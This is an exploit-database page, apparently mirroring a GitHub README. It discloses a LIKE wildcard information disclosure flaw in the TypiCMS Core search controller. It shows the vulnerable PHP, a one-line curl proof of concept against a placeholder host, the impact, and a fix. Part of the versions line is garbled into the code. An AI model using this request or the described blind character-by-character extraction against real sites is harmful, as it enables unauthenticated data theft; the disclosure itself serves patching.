Share
## https://sploitus.com/exploit?id=5B5D068E-CE5E-554B-BA2D-316D029FD92A
# TypiCMS Search LIKE Wildcard Information Disclosure
A proof-of-concept for a LIKE wildcard information disclosure vulnerability in TypiCMS Core.
## Vulnerability Type
Information Disclosure / SQL LIKE Wildcard Injection
## Affected Component
`TypiCMS\Modules\Core\Http\Controllers\SearchPublicController` โ Search functionality
## Affected Versions
TypiCMS Core $data) {
$query = $model->query()->where(function ($query) use ($words, $columns) {
foreach ($columns as $column) {
foreach ($words as $word) {
$word = addslashes($word); // % and _ NOT escaped
$query->whereRaw(
"`$column` LIKE '%$word%' COLLATE utf8mb4_unicode_ci"
);
}
}
});
}
```
## PoC
```bash
# Search for content starting with "a" (unauthenticated)
curl "http://target.com/en/search?query=a%25"
# Blind extraction script included: poc.py
```
## Impact
- Unauthenticated data extraction via blind search
- Bypass of 3-char minimum search length
- Automatable character-by-character extraction
## Fix
Replace `addslashes($word)` with `addcslashes($word, '%_')` or use parameterized queries.
## Reference
- https://github.com/Reznovs/TypiCMS-Search-LIKE-Wildcard-Info-Disclosure
- https://github.com/typicms/core